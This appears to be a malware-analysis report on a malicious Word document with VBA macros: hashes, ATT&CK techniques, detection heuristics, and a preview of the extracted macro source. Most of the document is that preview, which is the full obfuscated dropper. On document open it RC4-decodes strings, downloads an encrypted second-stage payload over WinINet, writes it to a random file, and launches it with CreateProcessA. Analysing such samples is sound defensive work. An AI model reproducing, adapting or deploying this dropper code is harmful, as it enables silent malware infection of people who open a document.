Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c261b684267cdd4c…

MALICIOUS

Office (OOXML)

Size: 40.5 KB
Created: 2015-06-24 11:31:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2015-09-30
MD5: 9ab32c9fd9fa4a82f17582b620ceac30 SHA-1: 9cd072d3de121707e5c8819b1f738bf9b640fb51 SHA-256: c261b684267cdd4c81bc8731ee53207cbbbc26d87f92ebbda2919a01c06a15e8
Risk Score: 180

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample is an OOXML document containing VBA macros, specifically a Document_Open macro, designed to execute malicious code. It employs a social engineering lure to prompt the user to enable editing and content, a common tactic for macro-based malware. The ClamAV detection signature 'Doc.Malware.Chronos-6897935-0' strongly indicates malicious intent, likely involving the download and execution of a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    LYuEB = Environ(HYXG3fbPOc2O(Chr(130) + Chr(8) + Chr(90) + Chr(60) + Chr(50) + Chr(164) + Chr(130), "RNz80sPG9")) & "\" & PZpOxq2pZUwZ & HYXG3fbPOc2O(Chr(251) + Chr(25) + Chr(217) + Chr(156), "VJ2lcNm")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 21793 bytes
SHA-256: bfbfc430ee30353d0960360a88510743ced418b0633a1185ffce92f24c5ba8bb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
166 of 269 identifiers look randomly generated (e.g. 'MsmOZAQyd3oyr5EbT8nbQ0f') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Declare Function InternetOpenUrlA Lib "wininet" (ByVal JIJV6xn8NPiPj4 As Long, ByVal O7LtYk5AAQb7YlK As String, ByVal OplvpKs3mUe As String, ByVal BsLO As Long, ByVal VV0fNfDFFK1TEJwg2 As Long, ByVal RtRXQ As Long) As Long
Private THVLt2SqZJ20tJU As String
Private Declare Function CloseHandle Lib "kernel32" (ByVal EMGJWpLsg0LFd As Long) As Long
Private Type TjtYWQXrM9
   LmOxABarcJL5m As Long
   IY25Gycjz As Long
   YC6rBXy1FOA7eKD As Long
   T5UVzKazSt As Long
End Type
Private Type U6ECwjZSVYBjj1hf
   U7KMQ As Long
   SN0bg As String
   IGnEh6v20L1NYhvAt As String
   YSOPevDS4IHdausoU As String
   QlcATJlwV As Long
   CQRj5lgO9Oa As Long
   QZttlBVim0l7 As Long
   P1P As Long
   Gmv As Long
   KJvMc As Long
   QT27vcs As Long
   X9xUgqux As Long
   WxEQZ As Integer
   XLi1io As Integer
   EarcJL5mn8f As Long
   POoBf9lV7 As Long
   TnE2KDG58AZ5 As Long
   RjyhX1nDMf As Long
End Type
Private Declare Function CreateProcessA Lib "kernel32" (ByVal Url3f1KXyv8J11m As String, ByVal I8bKS2YR1 As String, JW2xQHpblwmsh5n As Any, Sxq9R1 As Any, ByVal YEfxKcx0aKJeweM As Long, ByVal Xw4ybCk1XLcmT8 As Long, GOYklrIM As Any, ByVal D8hjj7hyTijd As String, RTYYHvE As U6ECwjZSVYBjj1hf, FAJrz As TjtYWQXrM9) As Long
Private Type Mm8EZ1xGjr
   YpjK As Byte
   TRNy7MISLyyqY3el() As Byte
End Type
Private FC4HQ4wRyHoIIq(0 To 255) As Integer
Private Declare Sub XUcNdRhe2q Lib "msvbvm60" Alias "#183" (ByVal TDuFODy7qupN As Long, ByVal CeO1YB As Long, ByVal Xsr As Long)
Private Declare Function InternetOpenA Lib "wininet" (ByVal HB5jLqTe As String, ByVal HaH4GTyhX1nDMf As Long, ByVal DIddGWQ5Vug As String, ByVal QrNTFvLOiTgngz8ga As String, ByVal Kgl94EOWQKUQY As Long) As Long
Private Type C03eX6D6jmcn
   IkzFuKw4WZ As Integer
   EIM As Integer
   W5AbpVdDDKhK As Integer
   KEIMYcvA As Integer
   PJOKCvOyXVug As Long
End Type
Private Declare Function InternetReadFile Lib "wininet" (ByVal XScFnkFPFzRjnxs As Long, ByVal BLouzWeN0 As String, ByVal MzBn3uifMb2aD As Long, W8vkjbv As Long) As Integer
Private Declare Function InternetCloseHandle Lib "wininet" (ByRef RZPDsr2z As Long) As Long
Private Function Xcb(ByVal DuzWgGR As String, ByVal MFcropMWPb1b6 As String, ByVal WLwulc3H As String) As Boolean
Dim QTmLcIBRs9 As Long, JHBEZ As Long
QTmLcIBRs9 = 60
JHBEZ = 71
If QTmLcIBRs9 + JHBEZ > 4 Then
JHBEZ = QTmLcIBRs9 + 64
Else
MsgBox 86
End If
Dim JILOYJnAGr4K8O As Long, O7Mm050QaTM2CcM As Long, NpmoHfnTmW As Long, HsNN As String * 8162, VU23E As String, Bk1V7lHbS As Integer, XtF3wXKz42535d As Double
Dim WJ8tJdv2IcWchIB As Long, CsrkI2q0T6TFE As Long
WJ8tJdv2IcWchIB = 33
CsrkI2q0T6TFE = 51
If WJ8tJdv2IcWchIB + CsrkI2q0T6TFE > 4 Then
CsrkI2q0T6TFE = WJ8tJdv2IcWchIB + 96
Else
MsgBox 60
End If
JILOYJnAGr4K8O = InternetOpenA(HYXG3fbPOc2O(Chr(237) + Chr(200) + Chr(123) + Chr(116) + Chr(29) + Chr(108) + Chr(116) + Chr(72) + Chr(250) + Chr(118) + Chr(210) + Chr(11) + Chr(65) + Chr(67) + Chr(131) + Chr(250) + Chr(107) + Chr(160) + Chr(141) + Chr(149) + Chr(98) + Chr(173) + Chr(113) + Chr(202) + Chr(15) + Chr(255) + Chr(53) + Chr(227) + Chr(1) + Chr(127) + Chr(100) + Chr(103) + Chr(191) + Chr(253) + Chr(190) + Chr(230) + Chr(249) + Chr(104) + Chr(38) + Chr(197) + Chr(165) + Chr(160) + Chr(252) + Chr(144) + Chr(167) + Chr(166) + Chr(213) + Chr(26) + Chr(117) + Chr(170) + Chr(19) + Chr(7) + Chr(117) + Chr(64) + Chr(114) + Chr(10) + Chr(166) + Chr(223) + Chr(243) + Chr(99) + Chr(185) + Chr(149) + Chr(186) + Chr(127) + Chr(186) + Chr(103) + Chr(91), "BE1w0EVHRHz"), 1, vbNullString, vbNullString, 0)
Dim OX1c8S As Long, DAmqB1ZckienBTJ8 As Long
OX1c8S = 46
DAmqB1ZckienBTJ8 = 13
If OX1c8S + DAmqB1ZckienBTJ8 > 4 Then
DAmqB1ZckienBTJ8 = OX1c8S + 13
Else
MsgBox 87
End If
If JILOYJnAGr4K8O = 0 Then
Dim BQ7XD4orJvj As Long, O7trr8chhxo053x As Long
BQ7XD4orJvj = 48
O7trr8chhxo053x = 9
If BQ7XD4orJvj + O7trr8chhxo053x > 4 Then
O7trr8chhxo053x = BQ7XD4orJvj + 1
Else
MsgBox 97
End If
  Xcb = False
  Exit Function
End If
Dim RHtdcGye6iVYJj2 As Long, Xf5HIRW9M As Long
RHtdcGye6iVYJj2 = 28
Xf5HIRW9M = 18
If RHtdcGye6iVYJj2 + Xf5HIRW9M > 4 Then
Xf5HIRW9M = RHtdcGye6iVYJj2 + 74
Else
MsgBox 77
End If
O7Mm050QaTM2CcM = InternetOpenUrlA(JILOYJnAGr4K8O, DuzWgGR, vbNullString, 0, &H4000000, 0)
Dim UFB6Ne As Long, AoE32jk0xCX As Long
UFB6Ne = 52
AoE32jk0xCX = 68
If UFB6Ne + AoE32jk0xCX > 4 Then
AoE32jk0xCX = UFB6Ne + 48
Else
MsgBox 9
End If
If O7Mm050QaTM2CcM = 0 Then
Dim QpR1fVviNPnv As Long, AM7ZEYO3mtZiC As Long
QpR1fVviNPnv = 69
AM7ZEYO3mtZiC = 18
If QpR1fVviNPnv + AM7ZEYO3mtZiC > 4 Then
AM7ZEYO3mtZiC = QpR1fVviNPnv + 19
Else
MsgBox 70
End If
  XtF3wXKz42535d = 0
Else
Dim FglqNK1AL97j As Long, GuZTbLgBd As Long
FglqNK1AL97j = 29
GuZTbLgBd = 39
If FglqNK1AL97j + GuZTbLgBd > 4 Then
GuZTbLgBd = FglqNK1AL97j + 10
Else
MsgBox 96
End If
InternetReadFile O7Mm050QaTM2CcM, HsNN, 8162, NpmoHfnTmW
VU23E = HsNN
Dim WH7lSweGRUW6 As Long, TxvEKunWzCSsDre As Long
WH7lSweGRUW6 = 19
TxvEKunWzCSsDre = 15
If WH7lSweGRUW6 + TxvEKunWzCSsDre > 4 Then
TxvEKunWzCSsDre = WH7lSweGRUW6 + 80
Else
MsgBox 58
End If
Do While NpmoHfnTmW <> 0
  InternetReadFile O7Mm050QaTM2CcM, HsNN, 8162, NpmoHfnTmW
  VU23E = VU23E + Mid(HsNN, 1, NpmoHfnTmW)
Loop
XtF3wXKz42535d = Len(VU23E)
Dim Acqrhgcq0PH As Long, Pgt0u8Z6wBIx As Long
Acqrhgcq0PH = 51
Pgt0u8Z6wBIx = 71
If Acqrhgcq0PH + Pgt0u8Z6wBIx > 4 Then
Pgt0u8Z6wBIx = Acqrhgcq0PH + 12
Else
MsgBox 38
End If
Bk1V7lHbS = FreeFile
Dim LgpXdb5vC2ecCEEY As Long, QJ8bblSqZ51vaCU As Long
LgpXdb5vC2ecCEEY = 54
QJ8bblSqZ51vaCU = 64
If LgpXdb5vC2ecCEEY + QJ8bblSqZ51vaCU > 4 Then
QJ8bblSqZ51vaCU = LgpXdb5vC2ecCEEY + 9
Else
MsgBox 22
End If
Open MFcropMWPb1b6 For Binary Access Write Lock Write As #Bk1V7lHbS
Put #Bk1V7lHbS, , YpWNNNANc9vyNOr(HYXG3fbPOc2O(VU23E, WLwulc3H))
Dim OppJOjQsnQlcNm As Long, BhNGxECkNGFZ As Long
OppJOjQsnQlcNm = 97
BhNGxECkNGFZ = 10
If OppJOjQsnQlcNm + BhNGxECkNGFZ > 4 Then
BhNGxECkNGFZ = OppJOjQsnQlcNm + 46
Else
MsgBox 62
End If
Close #Bk1V7lHbS
End If
InternetCloseHandle O7Mm050QaTM2CcM
Dim AwfoQcKloLPC0 As Long, My5ODSIUtyF As Long
AwfoQcKloLPC0 = 78
My5ODSIUtyF = 39
If AwfoQcKloLPC0 + My5ODSIUtyF > 4 Then
My5ODSIUtyF = AwfoQcKloLPC0 + 56
Else
MsgBox 58
End If
InternetCloseHandle JILOYJnAGr4K8O
VU23E = ""
If XtF3wXKz42535d Then
  Xcb = True
Dim LgVQT2sDjxe As Long, JqvIicQZDO6tlYPpc As Long
LgVQT2sDjxe = 58
JqvIicQZDO6tlYPpc = 72
If LgVQT2sDjxe + JqvIicQZDO6tlYPpc > 4 Then
JqvIicQZDO6tlYPpc = LgVQT2sDjxe + 31
Else
MsgBox 82
End If
End If
Dim IGlLFl0cgvkwUw0W1 As Long, YSMWDaI3lJGk8ZxOA As Long
IGlLFl0cgvkwUw0W1 = 30
YSMWDaI3lJGk8ZxOA = 10
If IGlLFl0cgvkwUw0W1 + YSMWDaI3lJGk8ZxOA > 4 Then
YSMWDaI3lJGk8ZxOA = IGlLFl0cgvkwUw0W1 + 71
Else
MsgBox 62
End If
End Function
Private Sub Document_Open()
On Error Resume Next
Dim UXtvSFVvMTX2 As Long, PdcRb82H As Long
UXtvSFVvMTX2 = 28
PdcRb82H = 66
If UXtvSFVvMTX2 + PdcRb82H > 4 Then
PdcRb82H = UXtvSFVvMTX2 + 77
Else
MsgBox 92
End If
Dim LYuEB As String
Dim ImIcSJVm0QLVqHq5F As Long, Nr4HNFu4FAkFQY As Long
ImIcSJVm0QLVqHq5F = 98
Nr4HNFu4FAkFQY = 80
If ImIcSJVm0QLVqHq5F + Nr4HNFu4FAkFQY > 4 Then
Nr4HNFu4FAkFQY = ImIcSJVm0QLVqHq5F + 8
Else
MsgBox 27
End If
Dim DQDtwwDT3yE As Long, GeYlpAU5 As Long, KIrpoKqhrS3aC As Long, Jc8Su As Integer
Dim Q1OBInxK5pUydz As Long, Dynn6FoVyr4taBji As Long
Q1OBInxK5pUydz = 88
Dynn6FoVyr4taBji = 57
If Q1OBInxK5pUydz + Dynn6FoVyr4taBji > 4 Then
Dynn6FoVyr4taBji = Q1OBInxK5pUydz + 78
Else
MsgBox 89
End If
DQDtwwDT3yE = 987864617: GeYlpAU5 = 0: KIrpoKqhrS3aC = 0
Dim JqA8rQSPLFWCO As Long, IIWlVIVyUfDdw2Za7 As Long
JqA8rQSPLFWCO = 42
IIWlVIVyUfDdw2Za7 = 72
If JqA8rQSPLFWCO + IIWlVIVyUfDdw2Za7 > 4 Then
IIWlVIVyUfDdw2Za7 = JqA8rQSPLFWCO + 79
Else
MsgBox 85
End If
For GeYlpAU5 = 1 To DQDtwwDT3yE
KIrpoKqhrS3aC = KIrpoKqhrS3aC + 1
Next GeYlpAU5
Dim WpPRu1fBWJD As Long, H0vmKEIEmy0 As Long
WpPRu1fBWJD = 65
H0vmKEIEmy0 = 30
If WpPRu1fBWJD + H0vmKEIEmy0 > 4 Then
H0vmKEIEmy0 = WpPRu1fBWJD + 35
Else
MsgBox 74
End If
If KIrpoKqhrS3aC = DQDtwwDT3yE Then
Dim H67YAFmv21DW As Long, KK8JuuyJb39GggZ9 As Long
H67YAFmv21DW = 67
KK8JuuyJb39GggZ9 = 95
If H67YAFmv21DW + KK8JuuyJb39GggZ9 > 4 Then
KK8JuuyJb39GggZ9 = H67YAFmv21DW + 37
Else
MsgBox 40
End If
LYuEB = Environ(HYXG3fbPOc2O(Chr(130) + Chr(8) + Chr(90) + Chr(60) + Chr(50) + Chr(164) + Chr(130), "RNz80sPG9")) & "\" & PZpOxq2pZUwZ & HYXG3fbPOc2O(Chr(251) + Chr(25) + Chr(217) + Chr(156), "VJ2lcNm")
Dim Qho4jmhtBX1Nbw As Long, P8d8GyghT As Long
Qho4jmhtBX1Nbw = 26
P8d8GyghT = 75
If Qho4jmhtBX1Nbw + P8d8GyghT > 4 Then
P8d8GyghT = Qho4jmhtBX1Nbw + 26
Else
MsgBox 47
End If
If Xcb(HYXG3fbPOc2O(Chr(88) + Chr(165) + Chr(6) + Chr(251) + Chr(85) + Chr(0) + Chr(150) + Chr(64) + Chr(218) + Chr(199) + Chr(230) + Chr(1) + Chr(48) + Chr(18) + Chr(106) + Chr(254) + Chr(112) + Chr(100) + Chr(6) + Chr(96) + Chr(224) + Chr(135) + Chr(189) + Chr(189) + Chr(219) + Chr(206), "YNVrymt3PFtVmZWBJ"), LYuEB, HYXG3fbPOc2O(Chr(63) + Chr(186) + Chr(21) + Chr(31) + Chr(54) + Chr(135) + Chr(181) + Chr(86) + Chr(82), "VZpb1IiuAkFQY")) = True Then
Dim J2sSL2XhJen As Long, PxlU2jKepXZAkd As Long
J2sSL2XhJen = 92
PxlU2jKepXZAkd = 47
If J2sSL2XhJen + PxlU2jKepXZAkd > 4 Then
PxlU2jKepXZAkd = J2sSL2XhJen + 84
Else
MsgBox 45
End If
YX9eCOOad2w 1
Dim QV5lFC52 As Long, RdSzajAAOTYZA80FJ As Long
QV5lFC52 = 74
RdSzajAAOTYZA80FJ = 2
If QV5lFC52 + RdSzajAAOTYZA80FJ > 4 Then
RdSzajAAOTYZA80FJ = QV5lFC52 + 21
Else
MsgBox 88
End If
CiHR2Fphg LYuEB
Dim XB0Ndy7njDf As Long, AFnSl As Long
XB0Ndy7njDf = 8
AFnSl = 30
If XB0Ndy7njDf + AFnSl > 4 Then
AFnSl = XB0Ndy7njDf + 62
Else
MsgBox 64
End If
End If
Dim Hs4cQgW7C As Long, JCUef5o901j As Long
Hs4cQgW7C = 5
JCUef5o901j = 14
If Hs4cQgW7C + JCUef5o901j > 4 Then
JCUef5o901j = Hs4cQgW7C + 85
Else
MsgBox 71
End If
ActiveDocument.Range.Text = HYXG3fbPOc2O(Chr(211) + Chr(16) + Chr(104) + Chr(251) + Chr(33) + Chr(176) + Chr(159) + Chr(245) + Chr(238) + Chr(69) + Chr(128) + Chr(20) + Chr(201) + Chr(21) + Chr(7) + Chr(24) + Chr(130) + Chr(160) + Chr(12) + Chr(175) + Chr(196) + Chr(209) + Chr(249) + Chr(88) + Chr(62) + Chr(156) + Chr(147) + Chr(182) + Chr(64) + Chr(90) + Chr(138) + Chr(197) + Chr(68) + Chr(49) + Chr(60) + Chr(71) + Chr(117) + Chr(190) + Chr(57) + Chr(18) + Chr(241) + Chr(105) + Chr(160) + Chr(111) + Chr(26) + Chr(60) + Chr(251) + Chr(91) + Chr(64) + Chr(18) + Chr(114) + Chr(232) + Chr(10) + Chr(178) + Chr(225) + Chr(66) + Chr(29) + Chr(174) + Chr(155) + Chr(47) + Chr(39) + Chr(20) + Chr(174) + Chr(247) + Chr(122) + Chr(10) + Chr(115) + Chr(10) + Chr(178) + Chr(116) + Chr(188), "JQTXtgM8brIQEv")
End If
Dim Ufv5Pvt As Long, BKqinhzrFru154 As Long
Ufv5Pvt = 53
BKqinhzrFru154 = 67
If Ufv5Pvt + BKqinhzrFru154 > 4 Then
BKqinhzrFru154 = Ufv5Pvt + 70
Else
MsgBox 88
End If
End Sub
Private Function YpWNNNANc9vyNOr(H60MnvXAXee As String) As String
Dim Jzc8SR5kP9hu4s() As Byte
Jzc8SR5kP9hu4s() = StrConv(H60MnvXAXee, vbFromUnicode)
DUYzbBVT92Ze Jzc8SR5kP9hu4s, Len(H60MnvXAXee)
YpWNNNANc9vyNOr = StrConv(Jzc8SR5kP9hu4s(), vbUnicode)
End Function
Private Sub KCzBZWRiVFxy(LNiU38FhDVQpY() As C03eX6D6jmcn, GqG5KmIi7zpwvOLP As Long, MwMs As Long, IaJe0xY4Vxu7ZO3h As Mm8EZ1xGjr)
Dim FokJ As Integer, TROoTM As Long
TROoTM = 0
For FokJ = 0 To (IaJe0xY4Vxu7ZO3h.YpjK - 1)
If (IaJe0xY4Vxu7ZO3h.TRNy7MISLyyqY3el(FokJ) = 0) Then
If (LNiU38FhDVQpY(TROoTM).W5AbpVdDDKhK = -1) Then
LNiU38FhDVQpY(TROoTM).W5AbpVdDDKhK = GqG5KmIi7zpwvOLP
LNiU38FhDVQpY(GqG5KmIi7zpwvOLP).IkzFuKw4WZ = TROoTM
LNiU38FhDVQpY(GqG5KmIi7zpwvOLP).W5AbpVdDDKhK = -1
LNiU38FhDVQpY(GqG5KmIi7zpwvOLP).EIM = -1
LNiU38FhDVQpY(GqG5KmIi7zpwvOLP).KEIMYcvA = -1
GqG5KmIi7zpwvOLP = GqG5KmIi7zpwvOLP + 1
End If
TROoTM = LNiU38FhDVQpY(TROoTM).W5AbpVdDDKhK
ElseIf (IaJe0xY4Vxu7ZO3h.TRNy7MISLyyqY3el(FokJ) = 1) Then
If (LNiU38FhDVQpY(TROoTM).EIM = -1) Then
LNiU38FhDVQpY(TROoTM).EIM = GqG5KmIi7zpwvOLP
LNiU38FhDVQpY(GqG5KmIi7zpwvOLP).IkzFuKw4WZ = TROoTM
LNiU38FhDVQpY(GqG5KmIi7zpwvOLP).W5AbpVdDDKhK = -1
LNiU38FhDVQpY(GqG5KmIi7zpwvOLP).EIM = -1
LNiU38FhDVQpY(GqG5KmIi7zpwvOLP).KEIMYcvA = -1
GqG5KmIi7zpwvOLP = GqG5KmIi7zpwvOLP + 1
End If
TROoTM = LNiU38FhDVQpY(TROoTM).EIM
Else
Stop
End If
Next
LNiU38FhDVQpY(TROoTM).KEIMYcvA = MwMs
End Sub
Sub ConcE(Xp8nxrr() As Byte, Optional XeMiMDRnE As String)
Dim RNKBn As Long, WFArtC2Ug As Long, IZNLGEaUqnUA As Byte, LGqhydOE4g As Long, QF4po40ExD5h As Long, GQpJVqEQ9QfPjHdK As Long, Ck1qesWo7HS8s(0 To 255) As Integer
If (Len(XeMiMDRnE) > 0) Then Kg0Xeo = XeMiMDRnE
XUcNdRhe2q 512, VarPtr(Ck1qesWo7HS8s(0)), VarPtr(FC4HQ4wRyHoIIq(0))
QF4po40ExD5h = UBound(Xp8nxrr) + 1
GQpJVqEQ9QfPjHdK = QF4po40ExD5h
For LGqhydOE4g = 0 To (QF4po40ExD5h - 1)
RNKBn = (RNKBn + 1) Mod 256
WFArtC2Ug = (WFArtC2Ug + Ck1qesWo7HS8s(RNKBn)) Mod 256
IZNLGEaUqnUA = Ck1qesWo7HS8s(RNKBn)
Ck1qesWo7HS8s(RNKBn) = Ck1qesWo7HS8s(WFArtC2Ug)
Ck1qesWo7HS8s(WFArtC2Ug) = IZNLGEaUqnUA
Xp8nxrr(LGqhydOE4g) = Xp8nxrr(LGqhydOE4g) Xor (Ck1qesWo7HS8s((Ck1qesWo7HS8s(RNKBn) + Ck1qesWo7HS8s(WFArtC2Ug)) Mod 256))
Next
End Sub
Sub YX9eCOOad2w(Hw6q7F3qMp As Long)
Dim PkGjlVH As Long, IGVceb3Vhlfb As Long
PkGjlVH = 52
IGVceb3Vhlfb = 71
If PkGjlVH + IGVceb3Vhlfb > 4 Then
IGVceb3Vhlfb = PkGjlVH + 61
Else
MsgBox 18
End If
Dim JMMU9fdN As Long
Dim VxRM5f1N21Y As Long, JIMJutnBAEeWg As Long
VxRM5f1N21Y = 90
JIMJutnBAEeWg = 55
If VxRM5f1N21Y + JIMJutnBAEeWg > 4 Then
JIMJutnBAEeWg = VxRM5f1N21Y + 33
Else
MsgBox 73
End If
JMMU9fdN = Timer + Hw6q7F3qMp
Do While Timer < JMMU9fdN
DoEvents
Loop
Dim Xi4DvF6ZhaQV As Long, Xtr As Long
Xi4DvF6ZhaQV = 88
Xtr = 62
If Xi4DvF6ZhaQV + Xtr > 4 Then
Xtr = Xi4DvF6ZhaQV + 14
Else
MsgBox 57
End If
End Sub
Private Property Let Kg0Xeo(JEE9Y2vuxOQt As String)
Dim Y1r7L As Long, L47NT1aFND As Long, VnWFXRn9I As Byte, FmeO4T0() As Byte, L5y4jJrlLM As Long
If (THVLt2SqZJ20tJU = JEE9Y2vuxOQt) Then Exit Property
THVLt2SqZJ20tJU = JEE9Y2vuxOQt
FmeO4T0() = StrConv(THVLt2SqZJ20tJU, vbFromUnicode)
L5y4jJrlLM = Len(THVLt2SqZJ20tJU)
For Y1r7L = 0 To 255
FC4HQ4wRyHoIIq(Y1r7L) = Y1r7L
Next Y1r7L
For Y1r7L = 0 To 255
L47NT1aFND = (L47NT1aFND + FC4HQ4wRyHoIIq(Y1r7L) + FmeO4T0(Y1r7L Mod L5y4jJrlLM)) Mod 256
VnWFXRn9I = FC4HQ4wRyHoIIq(Y1r7L)
FC4HQ4wRyHoIIq(Y1r7L) = FC4HQ4wRyHoIIq(L47NT1aFND)
FC4HQ4wRyHoIIq(L47NT1aFND) = VnWFXRn9I
Next
End Property
Function HYXG3fbPOc2O(Fg7ryETvYXeo As String, J0VhEjfRT9 As String) As String
Dim QrQH3rSLPdY As Long, L8FYqsZwHe As Long
QrQH3rSLPdY = 75
L8FYqsZwHe = 1
If QrQH3rSLPdY + L8FYqsZwHe > 4 Then
L8FYqsZwHe = QrQH3rSLPdY + 98
Else
MsgBox 30
End If
Dim byteArray() As Byte
byteArray() = StrConv(Fg7ryETvYXeo, vbFromUnicode)
ConcE byteArray(), J0VhEjfRT9
HYXG3fbPOc2O = StrConv(byteArray(), vbUnicode)
Dim A11W28rnz As Long, XtGxJXLtRdIa0G As Long
A11W28rnz = 30
XtGxJXLtRdIa0G = 82
If A11W28rnz + XtGxJXLtRdIa0G > 4 Then
XtGxJXLtRdIa0G = A11W28rnz + 26
Else
MsgBox 50
End If
End Function
Private Function PZpOxq2pZUwZ(Optional L8EdTIUgm1W As String = "0123456789") As String
Dim Ob4HJwjYCzviB8 As Long, Jnt4Vi3mG4 As Long
Ob4HJwjYCzviB8 = 18
Jnt4Vi3mG4 = 47
If Ob4HJwjYCzviB8 + Jnt4Vi3mG4 > 4 Then
Jnt4Vi3mG4 = Ob4HJwjYCzviB8 + 61
Else
MsgBox 64
End If
Dim UDSZU3i2() As Byte, PVoPyKfg2CeRov() As Byte, BKpnRWgGR As Long, EoeWuBph992 As Long, QrPMgHGn9DT As Long, TTQhi8 As String
Dim WpdH4PjktGNK As Long, UFTKbzyd3oyr5 As Long
WpdH4PjktGNK = 76
UFTKbzyd3oyr5 = 71
If WpdH4PjktGNK + UFTKbzyd3oyr5 > 4 Then
UFTKbzyd3oyr5 = WpdH4PjktGNK + 60
Else
MsgBox 95
End If
QrPMgHGn9DT = 0
Dim RB05v6eGQsxz As Long, MsmOZAQyd3oyr5EbT8nbQ0f As Long
RB05v6eGQsxz = 42
MsmOZAQyd3oyr5EbT8nbQ0f = 74
If RB05v6eGQsxz + MsmOZAQyd3oyr5EbT8nbQ0f > 4 Then
MsmOZAQyd3oyr5EbT8nbQ0f = RB05v6eGQsxz + 26
Else
MsgBox 24
End If
BMaDgeIOCl6Fl:
Dim PWkC As Long, RlPAL7q07zu0 As Long
PWkC = 15
RlPAL7q07zu0 = 32
If PWkC + RlPAL7q07zu0 > 4 Then
RlPAL7q07zu0 = PWkC + 33
Else
MsgBox 30
End If
Randomize
TTQhi8 = Int(30 * Rnd)
If TTQhi8 < 4 Then GoTo BMaDgeIOCl6Fl
QrPMgHGn9DT = TTQhi8
If QrPMgHGn9DT > 0& Then
Dim SDrmBO9cfMB As Long, SfJN99fDaKZNXk As Long
SDrmBO9cfMB = 45
SfJN99fDaKZNXk = 40
If SDrmBO9cfMB + SfJN99fDaKZNXk > 4 Then
SfJN99fDaKZNXk = SDrmBO9cfMB + 28
Else
MsgBox 63
End If
Randomize
UDSZU3i2 = L8EdTIUgm1W
Dim HMlZh355Ye6v As Long, Gud5paYh As Long
HMlZh355Ye6v = 31
Gud5paYh = 81
If HMlZh355Ye6v + Gud5paYh > 4 Then
Gud5paYh = HMlZh355Ye6v + 4
Else
MsgBox 91
End If
BKpnRWgGR = Len(L8EdTIUgm1W) - 1&
QrPMgHGn9DT = (QrPMgHGn9DT * 2&) - 1&
Dim Uzk2Nd As Long, BYo0HoUZtRc As Long
Uzk2Nd = 66
BYo0HoUZtRc = 76
If Uzk2Nd + BYo0HoUZtRc > 4 Then
BYo0HoUZtRc = Uzk2Nd + 47
Else
MsgBox 34
End If
ReDim PVoPyKfg2CeRov(QrPMgHGn9DT) As Byte
For EoeWuBph992 = 0& To QrPMgHGn9DT Step 2&
PVoPyKfg2CeRov(EoeWuBph992) = UDSZU3i2(CLng(BKpnRWgGR * Rnd) * 2&)
Next
Dim KsQyMzzoaPai As Long, TNk9jK As Long
KsQyMzzoaPai = 31
TNk9jK = 11
If KsQyMzzoaPai + TNk9jK > 4 Then
TNk9jK = KsQyMzzoaPai + 71
Else
MsgBox 62
End If
End If
Dim NLkoV As Long, NjAuYGcNLpzdT6 As Long
NLkoV = 8
NjAuYGcNLpzdT6 = 26
If NLkoV + NjAuYGcNLpzdT6 > 4 Then
NjAuYGcNLpzdT6 = NLkoV + 27
Else
MsgBox 24
End If
PZpOxq2pZUwZ = PVoPyKfg2CeRov
Dim EeH55k9jK As Long, LRcwr3 As Long
EeH55k9jK = 23
LRcwr3 = 54
If EeH55k9jK + LRcwr3 > 4 Then
LRcwr3 = EeH55k9jK + 61
Else
MsgBox 66
End If
End Function
Private Function CiHR2Fphg(HIDF16c53h1 As String)
Dim HiQCbrl1a As Long, TP5Ww2SzCBqdLh As Long
HiQCbrl1a = 29
TP5Ww2SzCBqdLh = 62
If HiQCbrl1a + TP5Ww2SzCBqdLh > 4 Then
TP5Ww2SzCBqdLh = HiQCbrl1a + 36
Else
MsgBox 43
End If
Dim XhWjSwNKCJuk As TjtYWQXrM9, AeT5sFq9Orr As U6ECwjZSVYBjj1hf, KDKMaVNV As String
Dim CtOo94TTRc4 As Long, BWTLc As Long
CtOo94TTRc4 = 46
BWTLc = 12
If CtOo94TTRc4 + BWTLc > 4 Then
BWTLc = CtOo94TTRc4 + 16
Else
MsgBox 55
End If
AeT5sFq9Orr.U7KMQ = Len(AeT5sFq9Orr)
Dim Td3oP9kn9ZTA5 As Long, Oj02E9 As Long
Td3oP9kn9ZTA5 = 89
Oj02E9 = 58
If Td3oP9kn9ZTA5 + Oj02E9 > 4 Then
Oj02E9 = Td3oP9kn9ZTA5 + 78
Else
MsgBox 89
End If
CreateProcessA KDKMaVNV, HIDF16c53h1, ByVal 0&, ByVal 0&, 1&, &H20&, ByVal 0&, KDKMaVNV, AeT5sFq9Orr, XhWjSwNKCJuk
Dim CP1URNO As Long, MZAiM As Long
CP1URNO = 69
MZAiM = 19
If CP1URNO + MZAiM > 4 Then
MZAiM = CP1URNO + 69
Else
MsgBox 90
End If
CloseHandle XhWjSwNKCJuk.IY25Gycjz
